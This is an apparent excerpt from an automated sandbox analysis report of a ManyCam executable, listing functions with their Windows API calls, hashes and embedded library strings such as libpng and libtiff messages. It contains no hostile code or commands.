Opcode ID: 5380ecd6c58ae11980828ad1f4b84ea6df1e54ba14efa23bf64b0481e8ed7457
Instruction ID: 98af563dca7e08dae4733c818569099b16958337ef14baff457f1a71e3476642
Opcode Fuzzy Hash: 5380ecd6c58ae11980828ad1f4b84ea6df1e54ba14efa23bf64b0481e8ed7457
Instruction Fuzzy Hash: C8F16CB1A05601DFC305AF60D589A6ABFF0FF84740F614D88E4D5262A9E731D8B5CF86

Function 00BD27C0 Relevance: 15.2, APIs: 10, Instructions: 166COMMON

Download Yara Rule

APIs

_ftol.MSVCR80 ref: 00BD2851
_ftol.MSVCR80 ref: 00BD286B
_ftol.MSVCR80 ref: 00BD288F
_ftol.MSVCR80 ref: 00BD28AA
_ftol.MSVCR80 ref: 00BD28EB
_ftol.MSVCR80 ref: 00BD2904
_ftol.MSVCR80 ref: 00BD293C
_ftol.MSVCR80 ref: 00BD2955
_ftol.MSVCR80 ref: 00BD29C3
_ftol.MSVCR80 ref: 00BD29E2

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _ftol
String ID:
API String ID: 2545261903-0
Opcode ID: 63b0a28bd0dbf413c891d77e37c6e56a85a26630c6cd36d132b08587f0fe0b65
Instruction ID: 03158efbed7dbf1c15d744c412501b640206b3e83cdf03e2ad7e984185cdcfe2
Opcode Fuzzy Hash: 63b0a28bd0dbf413c891d77e37c6e56a85a26630c6cd36d132b08587f0fe0b65
Instruction Fuzzy Hash: E45102716053029FC305AF21DA29256FBF4FB84340F224A2EE0C6977A6FB349469CF81

Function 00B95630 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 00B94A80: GetWindowLongA.USER32(?,000000EB), ref: 00B94A83

DefWindowProcA.USER32(?,?,?,?), ref: 00B95656
CallWindowProcA.USER32(?,?,?,?,?), ref: 00B95687

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Window$Proc$CallLong
String ID:
API String ID: 2055830364-0
Opcode ID: 781e254806f28d8ec1998a1fdf62ac066f1f4662daf48ff0b73b9976a098207e
Instruction ID: 07f4ca85a8015ac2f5064d515c453b55e06e997a5d10826443d9742014c300f8
Opcode Fuzzy Hash: 781e254806f28d8ec1998a1fdf62ac066f1f4662daf48ff0b73b9976a098207e
Instruction Fuzzy Hash: 1841A2B2644700AFD720DB28DC95F6BB3E8FB88710F408A1DFA8593291D770ED018BA5

Function 00B957F0 Relevance: 15.1, APIs: 10, Instructions: 96windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00B957F7
GetTickCount.KERNEL32 ref: 00B95816
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00B95849
DispatchMessageA.USER32(?), ref: 00B95889
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B958A4
Sleep.KERNEL32(00000001), ref: 00B958B0
TranslateMessage.USER32(?), ref: 00B958C0
DispatchMessageA.USER32(?), ref: 00B958CB
TranslateMessage.USER32(?), ref: 00B958EA
DispatchMessageA.USER32(?), ref: 00B958F5

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Message$Dispatch$CountTickTranslate$PeekSleep
String ID:
API String ID: 2014057112-0
Opcode ID: 9b84f8df6570df636a08f10a05b0c76ca38910198461996faeb8b07c1ba7ae66
Instruction ID: 0f146931093de339fdffba3c7f93e7cbc3fa3167d71fe4d6fd91b2e77ecee9d8
Opcode Fuzzy Hash: 9b84f8df6570df636a08f10a05b0c76ca38910198461996faeb8b07c1ba7ae66
Instruction Fuzzy Hash: F83127311897019BDB31DF64DDC4B6AB7E8EB84B10F40497EF98193190EB70E849C762

Function 004888F0 Relevance: 15.1, APIs: 10, Instructions: 73COMMON

Download Yara Rule

APIs

?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(7EC02BB4,?,?,?,?,?,?,00530C89,000000FF), ref: 00488924
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488936
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488941
?capacity@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488952
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 0048895D
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP80(00000000,00000000,?,?,?,?,00530C89,000000FF), ref: 0048897B
?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z.MSVCP80(?,?,?,?,?,00530C89,000000FF), ref: 00488998
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 004889A8
?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@PB_W@Z.MSVCP80(00000000,00000000,?,?,?,?,00530C89,000000FF), ref: 004889B7
?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@PB_W@Z.MSVCP80(00000000,?,?,?,?,00530C89,000000FF), ref: 004889C6

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$?append@?$basic_string@_V12@$?size@?$basic_string@D@2@@std@@D@std@@Myptr@?$basic_string@_U?$char_traits@V?$allocator@$??0?$basic_string@_??1?$basic_string@_?capacity@?$basic_string@_V12@@
String ID:
API String ID: 2582929383-0
Opcode ID: 99d232171a17d203477813e664fcae17ef49d5089341ea70655ec06df161d3e9
Instruction ID: cf8cf326054b3b9829f24e0287d30cae8bbcd3a7b8d77b238681494193127ac1
Opcode Fuzzy Hash: 99d232171a17d203477813e664fcae17ef49d5089341ea70655ec06df161d3e9
Instruction Fuzzy Hash: 62316F75900118EFDB04EF64D844AADBBB6FF98350F00852AF91697390DB349D45CF84

Function 004B2740 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 210memoryCOMMON

Download Yara Rule

APIs

CoTaskMemFree.OLE32(00000000,00000000), ref: 004B2816
_DebugHeapAllocator.LIBCPMTD ref: 004B280A

Part of subcall function 004167C0: _DebugHeapAllocator.LIBCPMTD ref: 004167CE

_DebugHeapAllocator.LIBCPMTD ref: 004B284D
_DebugHeapAllocator.LIBCPMTD ref: 004B287B
_DebugHeapAllocator.LIBCPMTD ref: 004B2926
_DebugHeapAllocator.LIBCPMTD ref: 004B2938

Strings

- PIN Id=%s Name=%s Dir=%s ConnectedTo=%s (%s), xrefs: 004B29AF
ConnectionMediaType:, xrefs: 004B29CD

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$FreeTask
String ID: - PIN Id=%s Name=%s Dir=%s ConnectedTo=%s (%s)$ConnectionMediaType:
API String ID: 2977454536-3767152877
Opcode ID: 7365bd653b06ff7014c07b105e705209bc8ea7cbefe77dba3365ebff6c9963ec
Instruction ID: 9de56078743278097fdae2ef512013b449c6826a7b1472736913757348bad0bc
Opcode Fuzzy Hash: 7365bd653b06ff7014c07b105e705209bc8ea7cbefe77dba3365ebff6c9963ec
Instruction Fuzzy Hash: 77A114719041189FCB29EB65CD84BDEB7B4AF49304F5081DAE00AA7291DB746F88CFA4

Function 00B91C60 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

memset.MSVCR80 ref: 00B91D14
AVIFileCreateStreamA.AVIFIL32(?,?,vids), ref: 00B91DCD
AVISaveOptions.AVIFIL32(00000000,00000000,00000001,?,?,?,?,vids), ref: 00B91E52
AVIMakeCompressedStream.AVIFIL32(?,?,?,00000000,?,?,vids), ref: 00B91E69
AVIStreamSetFormat.AVIFIL32(?,00000000,?,00000428,?,?,?,00000000,?,?,vids), ref: 00B91E94
cvCreateImage.CXCORE099(?,?,00000008,?,?,00000000,?,00000428,?,?,?,00000000,?,?,vids), ref: 00B91EC7

Strings

vids, xrefs: 00B91E0E
vids, xrefs: 00B91D9A, 00B91DA1

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Stream$Create$CompressedFileFormatImageMakeOptionsSavememset
String ID: vids$vids
API String ID: 1290796960-2916420342
Opcode ID: d5f6c89e975ee4b00564c70d84b236ad3d660cd0d6369b48b1fe2e5231c050e0
Instruction ID: 3860ceb6bf900c4281d0e11fdb49952893a9101950fc0f2265eadd65ac601711
Opcode Fuzzy Hash: d5f6c89e975ee4b00564c70d84b236ad3d660cd0d6369b48b1fe2e5231c050e0
Instruction Fuzzy Hash: AD717CB0508745DFD720CF29D880AABBBE8FF88355F104E6EF98883251E7349944CB52

Function 00BB8CB0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

_setjmp3.MSVCR80 ref: 00BB8CF5

Strings

Application is running with png.c from libpng-%.20s, xrefs: 00BB8DD4
Incompatible libpng version in application and library, xrefs: 00BB8DE6
Application was compiled with png.h from libpng-%.20s, xrefs: 00BB8DB7
1.2.8, xrefs: 00BB8D57, 00BB8D84, 00BB8DCC

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _setjmp3
String ID: 1.2.8$Application is running with png.c from libpng-%.20s$Application was compiled with png.h from libpng-%.20s$Incompatible libpng version in application and library
API String ID: 3837033383-821774253
Opcode ID: 5b45db52063ac99a70f7d432f4396e2b6d90a5c7765a45e6c922285ad1a5b184
Instruction ID: 8a7631986fd9a5fabe5ca7184dea145fbbc9d828b31f07e82eb0ad5218736cde
Opcode Fuzzy Hash: 5b45db52063ac99a70f7d432f4396e2b6d90a5c7765a45e6c922285ad1a5b184
Instruction Fuzzy Hash: D141FF71A416086FE720AB649C42FFBB7E9DF55300F14419AF98857282EBF0AD01C7A5

Function 00BCC9B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64windowmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,?), ref: 00BCC9F6
sprintf.MSVCR80 ref: 00BCCA09
vsprintf.MSVCR80 ref: 00BCCA26
GetFocus.USER32 ref: 00BCCA33
MessageBoxA.USER32(00000000), ref: 00BCCA3A
LocalFree.KERNEL32(00000000), ref: 00BCCA41

Strings

LIBTIFF, xrefs: 00BCC9BC
%s Warning, xrefs: 00BCC9DD, 00BCCA03

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Local$AllocFocusFreeMessagesprintfvsprintf
String ID: %s Warning$LIBTIFF
API String ID: 663082726-3418978845
Opcode ID: 97607ac2adaa171715d2c212955dcffbbc84ab6c4b8ccff55f4d5a9a999637a0
Instruction ID: c5142d17dd7cd3777b6c0844ed9d92967ff0aef7dc6887874e0ac8de46ffab2f
Opcode Fuzzy Hash: 97607ac2adaa171715d2c212955dcffbbc84ab6c4b8ccff55f4d5a9a999637a0
Instruction Fuzzy Hash: 5311253620251027C20447798C48E7B7F9CEF95372B25031EF6A6D36D2DFA2DC024264

Function 00BCCA50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64windowmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,?), ref: 00BCCA96
sprintf.MSVCR80 ref: 00BCCAA9
vsprintf.MSVCR80 ref: 00BCCAC6
GetFocus.USER32 ref: 00BCCAD3
MessageBoxA.USER32(00000000), ref: 00BCCADA
LocalFree.KERNEL32(00000000), ref: 00BCCAE1

Strings

LIBTIFF, xrefs: 00BCCA5C
%s Error, xrefs: 00BCCA7D, 00BCCAA3

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Local$AllocFocusFreeMessagesprintfvsprintf
String ID: %s Error$LIBTIFF
API String ID: 663082726-2650228428
Opcode ID: 511c68ad8120dea29c1ec87bebec517043de971329bad517e062adcb1ad399c2
Instruction ID: b5f1e84877aa68ae9ea403130dcc6b39f748a65e4c2ba8cb2a495802e144f16a
Opcode Fuzzy Hash: 511c68ad8120dea29c1ec87bebec517043de971329bad517e062adcb1ad399c2
Instruction Fuzzy Hash: 8511253610251467C20847798C58E7BBFDCEF99372F24031EF666D36D2DF619D0242A0

Function 00BC0940 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 185COMMON

Download Yara Rule

Strings

zero length keyword, xrefs: 00BC0AFB
Zero length keyword, xrefs: 00BC0AB1
Out of memory while procesing keyword, xrefs: 00BC0990
leading spaces removed from keyword, xrefs: 00BC0A36
keyword length must be 1 - 79 characters, xrefs: 00BC0AD0
extra interior spaces removed from keyword, xrefs: 00BC0A96
trailing spaces removed from keyword, xrefs: 00BC0A0F
invalid keyword character 0x%02X, xrefs: 00BC09D0

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID: Out of memory while procesing keyword$Zero length keyword$extra interior spaces removed from keyword$invalid keyword character 0x%02X$keyword length must be 1 - 79 characters$leading spaces removed from keyword$trailing spaces removed from keyword$zero length keyword
API String ID: 0-1527206911
Opcode ID: bedc28cd9c24573c2c705e60748bbc5797dbd2953d16a1875ad0c1ebca8dfdfe
Instruction ID: 4c1b2359457d57408804ede81d956ce794698a72aebb5622e8b719b94c451ec5
Opcode Fuzzy Hash: bedc28cd9c24573c2c705e60748bbc5797dbd2953d16a1875ad0c1ebca8dfdfe
Instruction Fuzzy Hash: D4515C265583888FD720AE289881FBA7BE5DF67304F4405DDF8C457343D7E6984787A2

Function 00B95FC0 Relevance: 13.6, APIs: 9, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B95FCF

Part of subcall function 00B94C20: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B94CA7
Part of subcall function 00B94C20: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,0004001F,00000000,?,00000000), ref: 00B94D0E

SetWindowLongA.USER32(?,000000EB,00000000), ref: 00B95FFA
SetWindowLongA.USER32(?,000000EB,00000000), ref: 00B96003
SelectObject.GDI32(?,?), ref: 00B9603B
DeleteObject.GDI32(00000000), ref: 00B96042
DeleteDC.GDI32(?), ref: 00B96050
SetWindowLongA.USER32(?,000000EB,00000000), ref: 00B9606B
cvFree_.CXCORE099(?), ref: 00B9606E
cvFree_.CXCORE099 ref: 00B9607D

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Window$Long$DeleteFree_Object$CreateOpenRectSelect
String ID:
API String ID: 1534964170-0
Opcode ID: 93539ac4b5fd21a009ff30543827438666f991ce8c20c469109b8ea1b8def9c0
Instruction ID: 7b3917fa8cae2a72c8bfcfb17ed3585c5cfb4bb69ddc31f1d32efb4bd92304c1
Opcode Fuzzy Hash: 93539ac4b5fd21a009ff30543827438666f991ce8c20c469109b8ea1b8def9c0
Instruction Fuzzy Hash: E32117B5600700AFC720DF69ECD4D27B7F9FB843107508A6DEA5683651DB35FC098A60

Function 004887A0 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

?erase@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@II@Z.MSVCP80(00000000,7EC02BB4,7EC02BB4,?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 004887D9
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(7EC02BB4,?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 004887E7
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,00488794,7EC02BB4,0049A100,0049A100), ref: 004887F5
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,00488794,7EC02BB4,0049A100,0049A100), ref: 00488800
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 00488819
?substr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV12@II@Z.MSVCP80(?,00000000,?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 0048882E
??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@ABV01@@Z.MSVCP80(?,?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 0048884B
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP80(?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 0048885B

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$Myptr@?$basic_string@_$V12@$??1?$basic_string@_??4?$basic_string@_?erase@?$basic_string@_?size@?$basic_string@?substr@?$basic_string@_D@2@@std@@D@std@@U?$char_traits@V01@V01@@V?$allocator@
String ID:
API String ID: 731949045-0
Opcode ID: 2f69720e727eced4ed2275371a078fe7476b196afe62a487cd70bae6314d5383
Instruction ID: 4406f9edcf3e418624fedf0353d0674b6ffa21746b1b988d8d39eeb2d4d24482
Opcode Fuzzy Hash: 2f69720e727eced4ed2275371a078fe7476b196afe62a487cd70bae6314d5383
Instruction Fuzzy Hash: 5C314D31900108EFDB04EF59E898A9DBBB6FB98350F40C52AF91A973A0DB30A944DF54

Function 00B91670 Relevance: 13.6, APIs: 9, Instructions: 68windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00B91694
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00B916AB
IsWindow.USER32(?), ref: 00B916B1
SendMessageA.USER32(?,0000040B,00000000,00000000), ref: 00B916C2
DestroyWindow.USER32(?), ref: 00B916C8
